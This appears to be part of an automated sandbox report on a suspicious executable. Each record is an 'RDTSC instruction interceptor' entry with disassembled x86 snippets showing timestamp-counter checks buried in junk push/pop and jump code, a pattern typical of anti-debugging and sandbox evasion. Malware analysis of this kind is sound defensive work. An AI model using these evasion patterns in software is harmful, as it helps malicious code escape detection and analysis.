Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0F6 second address: 52B116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8B146BE727h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B116 second address: 52B11C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B431 second address: 52B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ecx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B43C second address: 52B444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52EFC7 second address: 52EFCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50217B second address: 50217F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502281 second address: 502285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502285 second address: 502302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B14C5BAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop edi 0x0000000d popad 0x0000000e mov dword ptr [esp], ebx 0x00000011 mov di, E061h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, dword ptr [ebp+122D273Ch] 0x00000029 mov dword ptr [ebp+12493F4Ah], esp 0x0000002f add ecx, dword ptr [ebp+122D2AC9h] 0x00000035 cmp dword ptr [ebp+122D2A31h], 00000000h 0x0000003c jne 00007F8B14C5BB4Ah 0x00000042 sub dword ptr [ebp+1246A4F9h], edx 0x00000048 mov byte ptr [ebp+122D1E4Eh], 00000047h 0x0000004f adc edx, 595A6CC1h 0x00000055 mov eax, D49AA7D2h 0x0000005a add dword ptr [ebp+1245F710h], ebx 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 je 00007F8B14C5BA98h 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50267B second address: 50267F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50267F second address: 502690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 jbe 00007F8B14C5BA9Eh 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502690 second address: 341A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 nop 0x00000006 mov dx, si 0x00000009 push dword ptr [ebp+122D0421h] 0x0000000f call dword ptr [ebp+122D1BC1h] 0x00000015 pushad 0x00000016 xor dword ptr [ebp+122D218Ch], ecx 0x0000001c xor eax, eax 0x0000001e jnl 00007F8B146BE725h 0x00000024 mov edx, dword ptr [esp+28h] 0x00000028 sub dword ptr [ebp+122D218Ch], edi 0x0000002e mov dword ptr [ebp+122D2B01h], eax 0x00000034 jns 00007F8B146BE71Fh 0x0000003a mov esi, 0000003Ch 0x0000003f sub dword ptr [ebp+122D218Ch], edi 0x00000045 sub dword ptr [ebp+122D218Ch], esi 0x0000004b add esi, dword ptr [esp+24h] 0x0000004f add dword ptr [ebp+122D218Ch], ebx 0x00000055 lodsw 0x00000057 jnp 00007F8B146BE71Ch 0x0000005d mov dword ptr [ebp+122D19ADh], ebx 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jne 00007F8B146BE71Ch 0x0000006d mov ebx, dword ptr [esp+24h] 0x00000071 sub dword ptr [ebp+122D218Ch], ebx 0x00000077 pushad 0x00000078 add dword ptr [ebp+122D19ADh], edx 0x0000007e add edx, 33F31554h 0x00000084 popad 0x00000085 push eax 0x00000086 push eax 0x00000087 push edx 0x00000088 pushad 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502709 second address: 50272B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push ebx 0x00000008 jmp 00007F8B14C5BA9Fh 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50272B second address: 50276E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007F8B146BE718h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 00000014h 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 jmp 00007F8B146BE71Eh 0x00000026 mov di, A291h 0x0000002a mov di, A790h 0x0000002e push D01DDA7Dh 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50276E second address: 502772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5028E1 second address: 502900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a mov dword ptr [ebp+122D1ADDh], edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F8B146BE71Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502900 second address: 502906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502906 second address: 50290A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5029CD second address: 502A25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8B14C5BAA2h 0x0000000e push edi 0x0000000f push esi 0x00000010 pop esi 0x00000011 pop edi 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jo 00007F8B14C5BA9Ah 0x0000001d push ecx 0x0000001e pushad 0x0000001f popad 0x00000020 pop ecx 0x00000021 mov eax, dword ptr [eax] 0x00000023 ja 00007F8B14C5BAA0h 0x00000029 pushad 0x0000002a jng 00007F8B14C5BA96h 0x00000030 pushad 0x00000031 popad 0x00000032 popad 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ecx 0x0000003a jmp 00007F8B14C5BAA0h 0x0000003f pop ecx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 502C19 second address: 502C96 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jns 00007F8B146BE726h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007F8B146BE718h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c js 00007F8B146BE72Eh 0x00000032 jmp 00007F8B146BE728h 0x00000037 push 00000004h 0x00000039 mov dword ptr [ebp+122D26A5h], ecx 0x0000003f push eax 0x00000040 pushad 0x00000041 push ebx 0x00000042 jmp 00007F8B146BE71Dh 0x00000047 pop ebx 0x00000048 pushad 0x00000049 pushad 0x0000004a popad 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50306A second address: 50306E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5031BA second address: 5031D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8B146BE722h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F2BB second address: 52F2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F2BF second address: 52F2E5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8B146BE71Eh 0x00000010 jmp 00007F8B146BE71Ah 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F2E5 second address: 52F2FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8B14C5BA96h 0x00000009 jne 00007F8B14C5BA96h 0x0000000f popad 0x00000010 jng 00007F8B14C5BA9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F5C2 second address: 52F604 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE727h 0x00000007 jmp 00007F8B146BE728h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8B146BE71Bh 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F604 second address: 52F612 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8B14C5BA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F78E second address: 52F792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F792 second address: 52F796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F8FE second address: 52F905 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52F905 second address: 52F923 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8B14C5BA98h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pop eax 0x00000010 je 00007F8B14C5BA96h 0x00000016 popad 0x00000017 pushad 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FA78 second address: 52FA7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FA7C second address: 52FA80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FA80 second address: 52FA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FD33 second address: 52FD39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5356F6 second address: 535714 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE724h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535714 second address: 53571A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53571A second address: 53571E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53571E second address: 535736 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8B14C5BA9Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5358CB second address: 5358CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5358CF second address: 5358EC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F8B14C5BA9Bh 0x0000000e jo 00007F8B14C5BA96h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5358EC second address: 535919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8B146BE729h 0x00000008 jo 00007F8B146BE716h 0x0000000e pushad 0x0000000f popad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535919 second address: 53591D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535D5B second address: 535D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B146BE71Fh 0x00000009 ja 00007F8B146BE716h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53542F second address: 535435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535435 second address: 53543F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F8B146BE716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53543F second address: 535443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5361CF second address: 5361D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536321 second address: 536325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536325 second address: 53634F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007F8B146BE721h 0x0000000e jmp 00007F8B146BE71Bh 0x00000013 push esi 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 pop edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jno 00007F8B146BE716h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53634F second address: 536353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536353 second address: 536357 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539EBF second address: 539EC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539EC3 second address: 539ED1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 539ED1 second address: 539ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79AC second address: 4B79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B79B0 second address: 4B79B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B496 second address: 53B4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146BE71Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53B4A6 second address: 53B4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0C90 second address: 4B0CA2 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8B146BE716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F8B146BE71Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B0CA2 second address: 4B0CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8B14C5BAAAh 0x0000000a jmp 00007F8B14C5BAA2h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53E40F second address: 53E43D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8B146BE716h 0x00000008 ja 00007F8B146BE716h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007F8B146BE729h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544282 second address: 544286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544286 second address: 54428C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54428C second address: 544291 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542E12 second address: 542E1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542F7C second address: 542F94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F8B14C5BA9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 542F94 second address: 542F98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54311A second address: 543120 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54328D second address: 543297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F8B146BE716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54354D second address: 543561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8B14C5BA9Eh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 543561 second address: 54357C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F8B146BE730h 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007F8B146BE716h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54357C second address: 543582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5436E2 second address: 5436E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5436E8 second address: 5436EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 543846 second address: 54384A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5473EE second address: 54740F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F8B151F0E3Ch 0x0000000b jmp 00007F8B151F0E3Fh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54740F second address: 547428 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007F8B146C0A0Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547428 second address: 54742D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54742D second address: 547433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A4F8 second address: 54A519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007F8B151F0E48h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A519 second address: 54A553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A18h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F8B146C0A0Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jnp 00007F8B146C0A06h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54A553 second address: 54A563 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54DC05 second address: 54DC09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54DC09 second address: 54DC0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54DC0D second address: 54DC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5524B5 second address: 5524E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F8B151F0E40h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5524E0 second address: 552503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B146C0A13h 0x00000007 jmp 00007F8B146C0A0Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 552503 second address: 552524 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8B151F0E3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jne 00007F8B151F0E38h 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007F8B151F0E36h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
